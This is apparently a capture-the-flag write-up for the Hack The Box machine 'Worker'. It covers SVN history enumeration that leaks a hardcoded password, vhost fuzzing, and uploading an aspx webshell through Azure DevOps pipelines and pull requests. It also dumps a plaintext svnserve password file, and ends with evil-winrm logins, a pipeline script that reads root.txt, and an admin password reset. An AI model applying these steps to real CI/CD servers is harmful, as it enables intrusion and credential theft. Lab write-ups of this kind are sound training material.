HTB Worker - lmiyasato/lenny-hacking GitHub Wiki

  1. Recon stuff

    PORT STATE SERVICE REASON 80/tcp open http syn-ack 3690/tcp open svn syn-ack 5985/tcp open wsman syn-ack

GoBuster on port 80 doesnt reveal anything

Saw this on port 3690:

( success ( 2 2 ( ) ( edit-pipeline svndiff1 accepts-svndiff2 absent-entries commit-revprops depth log-revprops atomic-revprops partial-replay inherited-props ephemeral-txnprops file-revs-reverse list ) ) )
  1. Going after SVN stuff:

Checkout SVN:

kali@kali:~/Documents/HTB/worker$ svn checkout svn://10.10.10.203
Checked out revision 5.

Cat the moved.txt file:

kali@kali:~/Documents/HTB/worker$ cat moved.txt
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb

// The Worker team :)

Enumerate the log file:

kali@kali:~/Documents/HTB/worker$ svn log
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020) | 1 line

Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 09:50:20 -0400 (Sat, 20 Jun 2020) | 1 line

Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 09:46:19 -0400 (Sat, 20 Jun 2020) | 1 line

-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 09:45:16 -0400 (Sat, 20 Jun 2020) | 1 line

Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020) | 1 line

First version
------------------------------------------------------------------------

The deployment script seems interesting... use a svn up -r2 and cat the deploy.ps1 file.

kali@kali:~/Documents/HTB/worker$ svn up -r2
Updating '.':
A    deploy.ps1
Updated to revision 2.
kali@kali:~/Documents/HTB/worker$ ls
deploy.ps1  dimension.worker.htb
kali@kali:~/Documents/HTB/worker$ cat deploy.ps1 
$user = "nathen" 
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")

Since gobuster didn't work, gonna try WFUZZ with VHOST fuzzing:

kali@kali:~/Documents/HTB/worker$ wfuzz -c -w ./bitquark-subdomains-top100000.txt -u http://10.10.10.203 -H 'Host: FUZZ.worker.htb' --hh 703
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.203/
Total requests: 100000

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                         
=====================================================================

000000296:   200        170 L    542 W      6495 Ch     "alpha"                                                         
000007691:   200        355 L    1408 W     16045 Ch    "story"                                                         
000022566:   401        85 L     329 W      20028 Ch    "devops"                                                        
000023339:   200        397 L    1274 W     14803 Ch    "cartoon"                                                       
000023462:   200        111 L    398 W      4971 Ch     "lens"                                                          
000024714:   200        368 L    1173 W     14588 Ch    "dimension"                                                     
000037212:   400        6 L      26 W       334 Ch      "*"                                                             
000071250:   200        274 L    871 W      10134 Ch    "twenty"                                                        
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:F

Modify /etc/hosts file:

10.10.10.203 worker.htb alpha.worker.htb story.worker.htb devops.worker.htb cartoon.worker.htb lens.worker.htb dimension.worker.htb twenty.worker.htb

Also from dimension.worker.htb, it will give other vhosts, so add them in the /etc/hosts/ file:

solid-state.worker.htb spectral.worker.htb

Utilize devops.worker.htb, use nathen / wendel98 as the creds

Within the Pipelines → Builds --> Alpha CI, view the YAML code. The Target folder line could be a shell location.

steps:
- task: CopyFiles@2
  displayName: 'Deploy web site'
  inputs:
    SourceFolder: '$(Build.SourcesDirectory)'
    Contents: |
     **
     !.git/**/*
    TargetFolder: 'w:\sites\$(Build.Repository.Name).worker.htb'
    CleanTargetFolder: true
    OverWrite: true
  timeoutInMinutes: 5

Clicking on the Queue button, got permissions to start a build, can use the pipeline to push the change to the hosted site.

Try and upload an aspx webshell, (it will fail because it won't load in the master branch)

So create a branch and upload it and it will succeed.

Commit the file and create a pull request.

Use Nathalie Henley and select “1” on the work items and click on "Create

Click on Approve --> Complete --> Complete Merge

After enumeration, stuff gets loaded to dir w:\sites\spectral.worker.htb

Load up the aspx shell by LT (in the HTB folder), after snooping around, will get a passwd file in w:\svnrepos\www\conf as shown below.

This file is an example password file for svnserve. ### Its format is similar to that of svnserve.conf. As shown in the ### example below it contains one section labelled [users]. ### The name and password for each user follow, one account per line. [users] nathen = wendel98 nichin = fqerfqerf nichin = asifhiefh noahip = player nuahip = wkjdnw oakhol = bxwdjhcue owehol = supersecret paihol = painfulcode parhol = gitcommit pathop = iliketomoveit pauhor = nowayjose payhos = icanjive perhou = elvisisalive peyhou = ineedvacation phihou = pokemon quehub = pickme quihud = kindasecure rachul = guesswho raehun = idontknow ramhun = thisis ranhut = getting rebhyd = rediculous reeinc = iagree reeing = tosomepoint reiing = isthisenough renipr = dummy rhiire = users riairv = canyou ricisa = seewhich robish = onesare robisl = wolves11 robive = andwhich ronkay = onesare rubkei = the rupkel = sheeps ryakel = imtired sabken = drjones samken = aqua sapket = hamburger sarkil = friday

This cred below will work with Evil-RinRM

robisl = wolves11
evil-winrm -i 10.10.10.203 -u robisl -p wolves11
  1. On to root:

Login onto the devops.worker.htb as robisl / wolves11

Click New Pipeline --> Azure Repos Git --> Parts Unlimited --> starter pipeline

Delete the line pool: ‘Default’ because the server don't have pool angent so thebuild will fail.

Replace echo hellow world! with type C:\Users\Administrators\Desktop\root.txt

Then click “save and run” --> Create a new branch for this commit and start a pull request --> "Save and Run"

Open up the “Run a one-line script” and get the output here.

Going further, it is possible to change the administrator password, then WinRM into it as administrator:

kali@kali:~/Documents/HTB/worker$ evil-winrm -i 10.10.10.203 -u administrator -p Password123!

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Documents>